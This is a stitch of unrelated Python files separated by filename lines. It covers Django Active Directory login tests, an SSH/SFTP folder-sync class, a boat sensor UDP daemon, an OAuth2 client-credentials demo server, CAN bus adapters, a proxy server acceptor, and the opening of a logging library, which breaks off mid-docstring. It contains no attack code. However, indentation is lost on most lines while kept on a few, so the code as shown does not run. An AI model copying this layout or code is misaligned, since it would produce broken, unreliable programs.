# def test_discovery(self) -> None:
# """
# Tests 'python manage.py discover' command
# """
# out = StringIO()
# result = call_command('discover', stdout=out)
# self.assertIsNone(result)
# self.assertEqual(out.getvalue(), '')
# dc: str = DomainController.get()
# self.assertIsNotNone(dc)
#
# @override_settings(DEBUG=True)
# def test_logger(self) -> None:
# out: StringIO = StringIO()
# handler: logging.StreamHandler = logging.StreamHandler(stream=out)
# logger.addHandler(hdlr=handler)
# message: str = 'some test log message'
# logger.error(message)
# logger.removeHandler(hdlr=handler)
# self.assertEqual(out.getvalue().rstrip(), message)
#
#
class TestADTools(TestCase):
def test_clear_username(self):
self.assertEqual(ad_clear_username('user@domain.com'), 'user')
self.assertEqual(ad_clear_username('DOMAIN\\user'), 'user')
def test_login(self):
domain_controller_ip: str = '127.0.0.1'
if settings.ADTOOLS_TEST_USERNAME and settings.ADTOOLS_TEST_PASSWORD:
conn = django_adtools.ad_tools.ldap_connect(
                dc=domain_controller_ip,
username=settings.ADTOOLS_TEST_USERNAME,
password=settings.ADTOOLS_TEST_PASSWORD
)
self.assertIsNotNone(conn, 'Could not connect to Domain Controller')
dn: str = django_adtools.ad_tools.user_dn(
conn=conn,
username=settings.ADTOOLS_TEST_USERNAME,
domain=settings.ADTOOLS_DOMAIN
)
self.assertIsNotNone(
dn,
f'Could not get a Distinguished Name of user: {settings.ADTOOLS_TEST_USERNAME}'
)
print(f"Distinguished Name of user: {settings.ADTOOLS_TEST_USERNAME} is {dn}")
groups: List[str] = django_adtools.ad_tools.dn_groups(
conn=conn,
dn=dn,
domain=settings.ADTOOLS_DOMAIN
)
self.assertIsNotNone(groups, f"Could not get groups for user {dn}")
self.assertGreater(len(groups), 0, f'An empty groups array got for user {dn}')
print(f"ad_groups: {groups}")
self.assertIn(settings.ADTOOLS_TEST_GROUP, groups)
|
ServerWorkSync3.py
|
'''
Version 3.0 - Now \w Journals and Threading
'''
from watchdog.events import PatternMatchingEventHandler
from colorama import Fore, Style
from lib.rfilecmp import cmp
import stat,csv,time
import pandas as pd
import threading
import paramiko
import os,errno
'''(Hint: Check threading -> Attempt to connect (required data on ssh_client_dict) every X seconds)'''
# TODO #3: Implement a startup script to invoke ServerWorkSync for each workspace @workspaces.ini
'''(Hint: Check the workspace_sync_toy_example.py and generalize its behavior for each workspace)'''
# TODO #4: Implement the back-and-forth sync automatically (without executing two separate scripts)
class ServerWorkSync(PatternMatchingEventHandler):
def __init__(self, ssh_client_dict, localpath, remotepath, hostname='', verbose=False, shallow_filecmp=True, autosync=False, sync_interval=30, reconnect_interval=30,\
patterns=None, ignore_patterns=None, ignore_directories=False, case_sensitive=False):
super(ServerWorkSync, self).__init__(patterns, ignore_patterns, ignore_directories, case_sensitive)
self.localpath = localpath
self.remotepath = remotepath
self.hostname = hostname
self.verbose = verbose
self.shallow_filecmp = shallow_filecmp
self.autosync = autosync
self.sync_interval=sync_interval
self.reconnect_interval=reconnect_interval
        self.journal_path = os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv')
        if not os.path.exists(self.journal_path):
            self.__journal(mode='h', data=['timestamp', 'event', 'src', 'dest'])
self.root = os.path.split(localpath)[1]
self.ssh_client_dict = ssh_client_dict
try:
self.sftp_client = ssh_client_dict['connection'].open_sftp()
except (paramiko.SSHException): #SSH session not active
reconn_thread = threading.Thread(target=self.__reconnect)
reconn_thread.start()
reconn_thread.join()
if autosync:
self.sync_thread = threading.Thread(target=self.__sync)
self.sync_thread.start()
def exec_journals(self):
direxists = self.__directory_exists(os.path.join(self.remotepath, self.root))
print (f'{"@"+self.hostname+" " if self.hostname else ""}Reading the Journals. Updating Remote Server Files...\n')
''' If the Directory does not Exist (First-Time Syncing) Create the whole Directory Tree '''
if not direxists:
self.__cwd_scp(self.localpath, self.remotepath)
else:
''' Read the Journal and Update the Necessary Files '''
for activity in self.__journal():
# activity : ['timestamp' ,'event' , 'src', 'dest']
src_path = activity[2]
if activity[1] == 'moved':
dest_path = activity[3]
self.sftp_client.posix_rename(os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/')),
os.path.join(self.remotepath, self.root, ''.join(dest_path.split(self.root, 1)[1:]).strip('/')))
elif activity[1] == 'created':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
self.sftp_client.mkdir(dest_path)
else:
self.sftp_client.put(src_path, dest_path, callback=None, confirm=True)
elif activity[1] == 'deleted':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
self.sftp_client.rmdir(dest_path)
else:
self.sftp_client.remove(dest_path)
elif activity[1] == 'modified':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
pass
else:
if not cmp(src_path, dest_path, self.sftp_client, shallow=self.shallow_filecmp):
self.sftp_client.put(src_path, dest_path, callback=None, confirm=True)
def on_moved(self, event):
super(ServerWorkSync, self).on_moved(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Moved", "b")} {what}: from {event.src_path} to {event.dest_path}')
rec = [timestamp, 'moved', event.src_path, event.dest_path]
self.__journal(mode='w', data=rec)
def on_created(self, event):
super(ServerWorkSync, self).on_created(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Created", "g")} {what}: {event.src_path}')
rec = [timestamp, 'created', event.src_path, '']
self.__journal(mode='w', data=rec)
def on_deleted(self, event):
super(ServerWorkSync, self).on_deleted(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Deleted", "r")} {what}: {event.src_path}')
rec = [timestamp, 'deleted', event.src_path, '']
self.__journal(mode='w', data=rec)
def on_modified(self, event):
super(ServerWorkSync, self).on_modified(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Modified", "y")} {what}: {event.src_path}')
rec = [timestamp, 'modified', event.src_path, '']
self.__journal(mode='w', data=rec)
#####################################################################################
################################# PRIVATE FUNCTIONS #################################
#####################################################################################
def __reconnect(self):
while True:
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_pkey = paramiko.RSAKey.from_private_key_file(self.ssh_client_dict['pkey'])
ssh_client.connect(hostname=self.ssh_client_dict['host'], username=self.ssh_client_dict['uname'],\
port=self.ssh_client_dict['port'], pkey=ssh_pkey)
self.ssh_client_dict['connection'] = ssh_client
self.sftp_client = self.ssh_client_dict['connection'].open_sftp()
break
except (paramiko.SSHException, IOError):
pass
time.sleep(self.reconnect_interval)
def __sync(self):
while True:
try:
                self.exec_journals()
self.__clear_journals()
except (paramiko.SSHException, IOError): #SSH session not active
self.__reconnect()
finally:
time.sleep(self.sync_interval)
#####################################################################################
################################ AUXILIARY FUNCTIONS ################################
#####################################################################################
def __colorize(self, msg, color):
''' (on_moved): Blue
(on_created): Green
(on_deleted): Red
(on_modified): Yellow '''
        if color == 'b':
            return f'{Style.BRIGHT}{Fore.BLUE}{msg}{Style.RESET_ALL}'
        elif color == 'g':
            return f'{Style.BRIGHT}{Fore.GREEN}{msg}{Style.RESET_ALL}'
        elif color == 'r':
            return f'{Style.BRIGHT}{Fore.RED}{msg}{Style.RESET_ALL}'
        elif color == 'y':
            return f'{Style.BRIGHT}{Fore.YELLOW}{msg}{Style.RESET_ALL}'
def __remote_os_walk(self, root):
files = []
dirs = []
for f in self.sftp_client.listdir_attr(root):
if stat.S_ISDIR(f.st_mode):
dirs.append(f.filename)
else:
files.append(f.filename)
yield root, dirs, files
for folder in dirs:
for x in self.__remote_os_walk(self.__unix_path(root, folder)):
yield x
def __unix_path(self, *args):
"""Most handle UNIX pathing, not vice versa, enforce standard"""
return os.path.join(*args).replace('\\', '/')
def __directory_exists(self, path):
'os.path.exists for paramiko SCP object'
try:
self.sftp_client.stat(path)
except IOError as e:
if e.errno == errno.ENOENT:
return False
raise
else:
return True
def mkdir_p(self, remote_path, is_dir=False):
"""
Bringing mkdir -p to Paramiko.
sftp - is a valid sftp object (that's provided by the class)
remote_path - path to create on server.
is_dir - Flag that indicates whether remote_path is a directory or not.
        If remote_path is not a directory (i.e. it points to a file), the file part is stripped away and mkdir_p continues as usual.
"""
dirs_ = []
if is_dir:
dir_ = remote_path
else:
dir_, _ = os.path.split(remote_path)
while len(dir_) > 1:
dirs_.append(dir_)
dir_, _ = os.path.split(dir_)
if len(dir_) == 1 and not dir_.startswith("/"):
dirs_.append(dir_) # For a remote path like y/x.txt
while len(dirs_):
dir_ = dirs_.pop()
try:
self.sftp_client.stat(dir_)
            except IOError:
if self.verbose: print (f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Created", "g")} directory {dir_}')
self.sftp_client.mkdir(dir_)
def __cwd_scp(self, localpath, remotepath):
# recursively upload a full directory
tmp = os.getcwd()
os.chdir(os.path.split(localpath)[0])
for walker in os.walk(self.root):
try:
self.sftp_client.mkdir(os.path.join(remotepath,walker[0]))
            except IOError:  # directory may already exist
pass
for file in walker[2]:
if self.verbose: print (f'\t{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Copying", "g")} {os.path.join(walker[0],file)}...')
self.sftp_client.put(os.path.join(walker[0],file),os.path.join(remotepath,walker[0],file))
os.chdir(tmp)
def __filter_journals(self):
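        # Merge the remote and local journals and keep only the most recent event per
        # path (relative to the workspace root), so each file is synced in its latest state.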
try:
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'r') as f:
remote_journal = pd.read_csv(f, index_col=[0])
except FileNotFoundError:
remote_journal = None
local_journal = pd.read_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'), index_col=[0])
fn = pd.concat([remote_journal,local_journal], ignore_index=True)
fn['rel'] = fn['src'].apply(lambda path: ''.join(path.split(self.root, 1)[1:]).strip('/'))
exp = fn.loc[fn.groupby(['rel']).timestamp.idxmax()]
return exp.drop(['rel'], axis=1)
# TODO: Make it better, Make it fast.
def __clear_journals(self):
try:
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'r') as f:
remote_journal = pd.read_csv(f, index_col=[0])
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'w+') as f:
remote_journal.iloc[0:0].to_csv(f)
except FileNotFoundError:
pass
local_journal = pd.read_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'), index_col=[0])
local_journal.iloc[0:0].to_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'))
    def __journal(self, mode='r', data=None):
        if mode == 'r':
            # return an iterator over the merged and filtered journal records
            return (row[1] for row in self.__filter_journals().iterrows())
        if mode == 'w':
            # append a single record to the local journal
            with open(self.journal_path, mode='a', newline='') as f:
                csv.writer(f).writerow(data)
        if mode == 'h':
            # create the journal file and write the header row
            with open(self.journal_path, mode='w', newline='') as f:
                csv.writer(f).writerow(data)
|
sensord.py
|
#!/usr/bin/python3
#
# Copyright (c) 2017-2021 Ilker Temir
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import importlib
import json
import os
import socket
import sys
import threading
import time
PORT = 1920
client_list = []
class BoatSensor(object):
'''
Main class
'''
def __init__(self):
'''
All plugins under ./plugins directory will be automatically loaded and
initialized.
'''
        self.lock = threading.Lock()
        # Create the UDP socket before loading plugins, so emit() is safe to call
        # as soon as the plugin threads start.
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        base_dir = os.path.dirname(os.path.abspath(__file__))
for root, dirs, files in os.walk(os.path.join(base_dir, 'plugins')):
for file in files:
if file.endswith(".py") and file != '__init__.py':
plugin_file = 'plugins.' + file.replace('.py', '')
plugin = importlib.import_module(plugin_file).plugin(self)
if plugin.enabled:
# Each plugin is run on its own thread
thread = threading.Thread(target=plugin.start)
thread.daemon = True
thread.start()
def emit(self, values):
'''
Called by individual plugins to emit messages
'''
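        # 'values' must be JSON-serializable; assuming a Signal K style consumer, this is
        # typically a list of {"path": ..., "value": ...} dicts, e.g.
        # [{"path": "environment.inside.temperature", "value": 21.5}] (illustrative only).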
data = '{"updates":[{"$source":"sensord","values":%s}]}' % json.dumps(values)
self.sock.sendto(data.encode('utf-8'), ('127.0.0.1', PORT))
def run(self):
while True:
try:
time.sleep(0.5)
except KeyboardInterrupt:
sys.exit()
if __name__ == '__main__':
sensord = BoatSensor()
sensord.run()
|
client_credentials_grant.py
|
import os
import signal
import sys
from wsgiref.simple_server import WSGIRequestHandler, make_server
sys.path.insert(0, os.path.abspath(os.path.realpath(__file__) + '/../../../'))
from oauth2 import Provider
from oauth2.grant import ClientCredentialsGrant
from oauth2.store.memory import ClientStore, TokenStore
from oauth2.tokengenerator import Uuid4TokenGenerator
from oauth2.web.wsgi import Application
from multiprocessing import Process
class OAuthRequestHandler(WSGIRequestHandler):
"""
Request handler that enables formatting of the log messages on the console.
This handler is used by the oauth2-stateless application.
"""
def address_string(self):
return "oauth2-stateless"
def run_auth_server():
try:
client_store = ClientStore()
client_store.add_client(client_id="abc", client_secret="xyz", redirect_uris=[])
token_store = TokenStore()
token_gen = Uuid4TokenGenerator()
token_gen.expires_in['client_credentials'] = 3600
auth_controller = Provider(
access_token_store=token_store,
auth_code_store=token_store,
client_store=client_store,
token_generator=token_gen)
auth_controller.add_grant(ClientCredentialsGrant())
app = Application(provider=auth_controller)
httpd = make_server('', 8080, app, handler_class=OAuthRequestHandler)
print("Starting implicit_grant oauth2 server on http://localhost:8080/...")
httpd.serve_forever()
except KeyboardInterrupt:
httpd.server_close()
def main():
auth_server = Process(target=run_auth_server)
auth_server.start()
print("To test getting an auth token, execute the following curl command:")
print("curl --ipv4 -v -X POST -d 'grant_type=client_credentials&client_id=abc&client_secret=xyz' "
"http://localhost:8080/token")
def sigint_handler(signal, frame):
print("Terminating server...")
auth_server.terminate()
auth_server.join()
signal.signal(signal.SIGINT, sigint_handler)
if __name__ == "__main__":
main()
|
adapters.py
|
import can
import socket
import struct
import serial
from queue import Queue, Empty
import threading
class SocketCANConnection:
# See <linux/can.h> for format
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)
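    # "=IB3x8s": native byte order with standard sizes - 4-byte CAN id, 1-byte DLC,
    # 3 padding bytes and 8 data bytes (16 bytes total), matching struct can_frame.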
def __init__(self, interface):
"""
Initiates a CAN connection on the given interface (e.g. 'can0').
"""
# Creates a raw CAN connection and binds it to the given interface.
self.socket = socket.socket(socket.AF_CAN,
socket.SOCK_RAW,
socket.CAN_RAW)
self.socket.bind((interface, ))
self.socket.settimeout(1.)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 4096)
def send_frame(self, frame):
data = frame.data.ljust(8, b'\x00')
data = struct.pack(self.CAN_FRAME_FMT,
frame.id,
len(frame.data),
data)
self.socket.send(data)
def receive_frame(self):
try:
frame, _ = self.socket.recvfrom(self.CAN_FRAME_SIZE)
except socket.timeout:
return None
can_id, can_dlc, data = struct.unpack(self.CAN_FRAME_FMT, frame)
return can.Frame(id=can_id, data=data[:can_dlc])
class SerialCANConnection:
"""
Implements the slcan API.
"""
MIN_MSG_LEN = len('t1230')
def __init__(self, port):
self.port = port
self.rx_queue = Queue()
t = threading.Thread(target=self.spin)
t.daemon = True
t.start()
        self.send_command('S8')  # bitrate 1 Mbit/s
        self.send_command('O')   # open device
port.reset_input_buffer()
def spin(self):
part = ''
while True:
part += self.port.read(100).decode('ascii')
            if part.startswith('\r'):
                part = part.lstrip('\r')
if '\r' not in part:
continue
data = part.split('\r')
data, part = data[:-1], data[-1]
for frame in data:
                if not frame:
                    continue
frame = self.decode_frame(frame)
if frame:
self.rx_queue.put(frame)
def send_command(self, cmd):
cmd += '\r'
cmd = cmd.encode('ascii')
self.port.write(cmd)
def decode_frame(self, msg):
if len(msg) < self.MIN_MSG_LEN:
return None
cmd, msg = msg[0], msg[1:]
if cmd == 'T':
extended = True
id_len = 8
elif cmd == 't':
extended = False
id_len = 3
else:
return None
if len(msg) < id_len + 1:
return None
can_id = int(msg[0:id_len], 16)
msg = msg[id_len:]
data_len = int(msg[0])
msg = msg[1:]
if len(msg) < 2 * data_len:
return None
data = [int(msg[i:i+2], 16) for i in range(0, 2 * data_len, 2)]
return can.Frame(id=can_id, data=bytearray(data), data_length=data_len, extended=extended)
def encode_frame(self, frame):
if frame.extended:
cmd = 'T'
can_id = '{:08x}'.format(frame.id)
else:
cmd = 't'
can_id = '{:03x}'.format(frame.id)
length = '{:x}'.format(frame.data_length)
data = ''
for b in frame.data:
data += '{:02x}'.format(b)
return cmd + can_id + length + data
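    # Example (illustrative): a standard frame with id=0x123 and data b'\x01\x02' encodes
    # to 't12320102' ('t' + 3 hex digits of id + 1-digit length + hex payload);
    # decode_frame() parses that string back into an equivalent frame.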
def send_frame(self, frame):
cmd = self.encode_frame(frame)
self.send_command(cmd)
def receive_frame(self):
try:
return self.rx_queue.get(True, 1) # block with timeout 1 sec
        except Empty:  # no frame received within the timeout
return None
|
acceptor.py
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
Network monitoring, controls & Application development, testing, debugging.
:copyright: (c) 2013-present by Abhinav Singh and contributors.
:license: BSD, see LICENSE for more details.
"""
import logging
import multiprocessing
import multiprocessing.synchronize
import selectors
import socket
import threading
from multiprocessing import connection
from multiprocessing.reduction import send_handle, recv_handle
from typing import Optional, Type, Tuple
from .work import Work
from .threadless import Threadless
from ..connection import TcpClientConnection
from ..event import EventQueue, eventNames
from ...common.constants import DEFAULT_THREADLESS
from ...common.flags import Flags
from ...common.flag import flags
logger = logging.getLogger(__name__)
flags.add_argument(
'--threadless',
action='store_true',
default=DEFAULT_THREADLESS,
help='Default: False. When disabled a new thread is spawned '
'to handle each client connection.'
)
class Acceptor(multiprocessing.Process):
"""Socket server acceptor process.
    Accepts a server socket fd over `work_queue` and starts listening for client
    connections over the passed server socket. By default, it spawns a separate thread
    to handle each client request.
    However, if the `--threadless` option is enabled, the Acceptor process also pre-spawns a
    `Threadless` process at startup. Accepted client connections are then passed to the
    `Threadless` process, which internally uses an asyncio event loop to handle client connections.
    TODO(abhinavsingh): Instead of starting a `Threadless` process, can we work with a `Threadless` thread?
    What are the performance implications of sharing fds between threads vs processes? How much performance
    degradation happens when processes are running on separate CPU cores?
"""
def __init__(
self,
idd: int,
work_queue: connection.Connection,
flags: Flags,
work_klass: Type[Work],
lock: multiprocessing.synchronize.Lock,
event_queue: Optional[EventQueue] = None) -> None:
super().__init__()
self.idd = idd
self.work_queue: connection.Connection = work_queue
self.flags = flags
self.work_klass = work_klass
self.lock = lock
self.event_queue = event_queue
self.running = multiprocessing.Event()
self.selector: Optional[selectors.DefaultSelector] = None
self.sock: Optional[socket.socket] = None
self.threadless_process: Optional[Threadless] = None
self.threadless_client_queue: Optional[connection.Connection] = None
def start_threadless_process(self) -> None:
pipe = multiprocessing.Pipe()
self.threadless_client_queue = pipe[0]
self.threadless_process = Threadless(
client_queue=pipe[1],
flags=self.flags,
work_klass=self.work_klass,
event_queue=self.event_queue
)
self.threadless_process.start()
logger.debug('Started process %d', self.threadless_process.pid)
def shutdown_threadless_process(self) -> None:
assert self.threadless_process and self.threadless_client_queue
logger.debug('Stopped process %d', self.threadless_process.pid)
self.threadless_process.running.set()
self.threadless_process.join()
self.threadless_client_queue.close()
def start_work(self, conn: socket.socket, addr: Tuple[str, int]) -> None:
if self.flags.threadless and \
self.threadless_client_queue and \
self.threadless_process:
self.threadless_client_queue.send(addr)
send_handle(
self.threadless_client_queue,
conn.fileno(),
self.threadless_process.pid
)
conn.close()
else:
work = self.work_klass(
TcpClientConnection(conn, addr),
flags=self.flags,
event_queue=self.event_queue
)
work_thread = threading.Thread(target=work.run)
work_thread.daemon = True
work.publish_event(
event_name=eventNames.WORK_STARTED,
event_payload={'fileno': conn.fileno(), 'addr': addr},
publisher_id=self.__class__.__name__
)
work_thread.start()
def run_once(self) -> None:
with self.lock:
assert self.selector and self.sock
events = self.selector.select(timeout=1)
if len(events) == 0:
return
conn, addr = self.sock.accept()
self.start_work(conn, addr)
def run(self) -> None:
self.selector = selectors.DefaultSelector()
fileno = recv_handle(self.work_queue)
self.work_queue.close()
self.sock = socket.fromfd(
fileno,
family=self.flags.family,
type=socket.SOCK_STREAM
)
try:
self.selector.register(self.sock, selectors.EVENT_READ)
if self.flags.threadless:
self.start_threadless_process()
while not self.running.is_set():
self.run_once()
except KeyboardInterrupt:
pass
finally:
self.selector.unregister(self.sock)
if self.flags.threadless:
self.shutdown_threadless_process()
self.sock.close()
logger.debug('Acceptor#%d shutdown', self.idd)
|
_logger.py
|
"""
.. References and links rendered by Sphinx are kept here as "module documentation" so that they can
be used in the ``Logger`` docstrings but do not pollute ``help(logger)`` output.
.. |Logger| replace:: :class:`~Logger`
.. |add| replace:: :meth:`~Logger.add()`
.. |remove| replace:: :meth:`~Logger.remove()`
.. |complete| replace:: :meth:`~Logger.complete()`
.. |catch| replace:: :meth:`~Logger.catch()`
.. |bind| replace:: :meth:`~Logger.bind()`
.. |contextualize| replace:: :meth:`~Logger.contextualize()`
.. |patch| replace:: :meth:`~Logger.patch()`
.. |opt| replace:: :meth:`~Logger.opt()`
.. |log| replace:: :meth:`~Logger.log()`
.. |level| replace:: :meth:`~Logger.level()`
.. |enable| replace:: :meth:`~Logger.enable()`
.. |disable| replace:: :meth:`~Logger.disable()`
.. |str| replace:: :class:`str`
.. |int| replace:: :class:`int`
.. |bool| replace:: :class:`bool`
.. |tuple| replace:: :class:`tuple`
.. |namedtuple| replace:: :func:`namedtuple<collections.namedtuple>`
.. |list| replace:: :class:`list`
.. |dict| replace:: :class:`dict`
.. |str.format| replace:: :meth:`str.format()`
.. |Path| replace:: :class:`pathlib.Path`
.. |match.groupdict| replace:: :meth:`re.Match.groupdict()`
.. |Handler| replace:: :class:`logging.Handler`
.. |sys.stderr| replace:: :data:`sys.stderr`
.. |sys.exc_info| replace:: :func:`sys.exc_info()`
.. |time| replace:: :class:`datetime.time`
.. |datetime| replace:: :class:`datetime.datetime`
.. |timedelta| replace:: :class:`datetime.timedelta`
.. |open| replace:: :func:`open()`
.. |logging| replace:: :mod:`logging`
.. |contextvars| replace:: :mod:`contextvars`
.. |Thread.run| replace:: :meth:`Thread.run()<threading.Thread.run()>`
.. |Exception| replace:: :class:`Exception`
.. |locale.getpreferredencoding| replace:: :func:`locale.getpreferredencoding()`
.. |AbstractEventLoop| replace:: :class:`AbstractEventLoop<asyncio.AbstractEventLoop>`
.. |asyncio.get_event_loop| replace:: :func:`asyncio.get_event_loop()`
.. |asyncio.run| replace:: :func:`asyncio.run()`
.. |loop.run_until_complete| replace::
:meth:`loop.run_until_complete()<asyncio.loop.run_until_complete()>`
.. |loop.create_task| replace:: :meth:`loop.create_task()<asyncio.loop.create_task()>`
.. |logger.trace| replace:: :meth:`logger.trace()<Logger.trace()>`
.. |logger.debug| replace:: :meth:`logger.debug()<Logger.debug()>`
.. |logger.info| replace:: :meth:`logger.info()<Logger.info()>`
.. |logger.success| replace:: :meth:`logger.success()<Logger.success()>`
.. |logger.warning| replace:: :meth:`logger.warning()<Logger.warning()>`
.. |logger.error| replace:: :meth:`logger.error()<Logger.error()>`
.. |logger.critical| replace:: :meth:`logger.critical()<Logger.critical()>`
.. |file-like object| replace:: ``file-like object``
.. _file-like object: https://docs.python.org/3/glossary.html#term-file-object
.. |callable| replace:: ``callable``
.. _callable: https://docs.python.org/3/library/functions.html#callable
.. |coroutine function| replace:: ``coroutine function``
.. _coroutine function: https://docs.python.org/3/glossary.html#term-coroutine-function
.. |re.Pattern| replace:: ``re.Pattern``
.. _re.Pattern: https://docs.python.org/3/library/re.html#re-objects
.. |better_exceptions| replace:: ``better_exceptions``
.. _better_exceptions: https://github.com/Qix-/better-exceptions
.. _Pendulum: https://pendulum.eustace.io/docs/#tokens
.. _@sdispater: https://github.com/sdispater
.. _@Qix-: https://github.com/Qix-
.. _Formatting directives: https://docs.python.org/3/library/string.html#format-string-syntax
"""
import asyncio
import builtins
import contextlib
import functools
import itertools
import logging
import re
import sys
import warnings
from collections import namedtuple
from inspect import isclass, iscoroutinefunction, isgeneratorfunction
from multiprocessing import current_process
from os.path import basename, splitext
from threading import current_thread
from . import _colorama, _defaults, _filters
from ._better_exceptions import ExceptionFormatter
from ._colorizer import Colorizer
from ._datetime import aware_now
from ._error_interceptor import ErrorInterceptor
from ._file_sink import FileSink
from ._get_frame import get_frame
from ._handler import Handler
from ._locks_machinery import create_logger_lock
from ._recattrs import RecordException, RecordFile, RecordLevel, RecordProcess, RecordThread
from ._simple_sinks import AsyncSink, CallableSink, StandardSink, StreamSink
if sys.version_info >= (3, 6):
from os import PathLike
else:
from pathlib import PurePath as PathLike
if sys.version_info >= (3, 7):
from contextvars import ContextVar
elif sys.version_info >= (3, 5, 3):
from aiocontextvars import ContextVar
else:
from contextvars import ContextVar
Level = namedtuple("Level", ["name", "no", "color", "icon"])
start_time = aware_now()
context = ContextVar("loguru_context", default={})
class Core:
def __init__(self):
levels = [
Level(
"TRACE",
_defaults.LOGURU_TRACE_NO,
_defaults.LOGURU_TRACE_COLOR,
_defaults.LOGURU_TRACE_ICON,
),
Level(
"DEBUG",
_defaults.LOGURU_DEBUG_NO,
_defaults.LOGURU_DEBUG_COLOR,
_defaults.LOGURU_DEBUG_ICON,
),
Level(
"INFO",
_defaults.LOGURU_INFO_NO,
_defaults.LOGURU_INFO_COLOR,
_defaults.LOGURU_INFO_ICON,
),
Level(
"SUCCESS",
_defaults.LOGURU_SUCCESS_NO,
_defaults.LOGURU_SUCCESS_COLOR,
_defaults.LOGURU_SUCCESS_ICON,
),
Level(
"WARNING",
_defaults.LOGURU_WARNING_NO,
_defaults.LOGURU_WARNING_COLOR,
_defaults.LOGURU_WARNING_ICON,
),
Level(
"ERROR",
_defaults.LOGURU_ERROR_NO,
_defaults.LOGURU_ERROR_COLOR,
_defaults.LOGURU_ERROR_ICON,
),
Level(
"CRITICAL",
_defaults.LOGURU_CRITICAL_NO,
_defaults.LOGURU_CRITICAL_COLOR,
_defaults.LOGURU_CRITICAL_ICON,
),
]
self.levels = {level.name: level for level in levels}
self.levels_ansi_codes = {
name: Colorizer.ansify(level.color) for name, level in self.levels.items()
}
self.levels_ansi_codes[None] = ""
self.handlers_count = itertools.count()
self.handlers = {}
self.extra = {}
self.patcher = None
self.min_level = float("inf")
self.enabled = {}
self.activation_list = []
self.activation_none = True
self.lock = create_logger_lock()
def __getstate__(self):
state = self.__dict__.copy()
state["lock"] = None
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.lock = create_logger_lock()
class Logger:
"""An object to dispatch logging messages to configured handlers.
The |Logger| is the core object of ``loguru``, every logging configuration and usage pass
through a call to one of its methods. There is only one logger, so there is no need to retrieve
one before usage.
Once the ``logger`` is imported, it can be used to write messages about events happening in your
code. By reading the output logs of your application, you gain a better understanding of the
flow of your program and you more easily track and debug unexpected behaviors.
Handlers to which the logger sends log messages are added using the |add| method. Note that you
can use the |Logger| right after import as it comes pre-configured (logs are emitted to
|sys.stderr| by default). Messages can be logged with different severity levels and using braces
attributes like the |str.format| method do.
When a message is logged, a "record" is associated with it. This record is a dict which contains
information about the logging context: time, function, file, line, thread, level... It also
contains the ``__name__`` of the module, this is why you don't need named loggers.
You should not instantiate a |Logger| by yourself, use ``from loguru import logger`` instead.
"""
def __init__(self, core, exception, depth, record, lazy, colors, raw, capture, patcher, extra):
self._core = core
self._options = (exception, depth, record, lazy, colors, raw, capture, patcher, extra)
def __repr__(self):
return "<loguru.logger handlers=%r>" % list(self._core.handlers.values())
def add(
self,
sink,
*,
level=_defaults.LOGURU_LEVEL,
format=_defaults.LOGURU_FORMAT,
filter=_defaults.LOGURU_FILTER,
colorize=_defaults.LOGURU_COLORIZE,
serialize=_defaults.LOGURU_SERIALIZE,
backtrace=_defaults.LOGURU_BACKTRACE,
diagnose=_defaults.LOGURU_DIAGNOSE,
enqueue=_defaults.LOGURU_ENQUEUE,
catch=_defaults.LOGURU_CATCH,
**kwargs
):
r"""Add a handler sending log messages to a sink adequately configured.
Parameters
----------
sink : |file-like object|_, |str|, |Path|, |callable|_, |coroutine function|_ or |Handler|
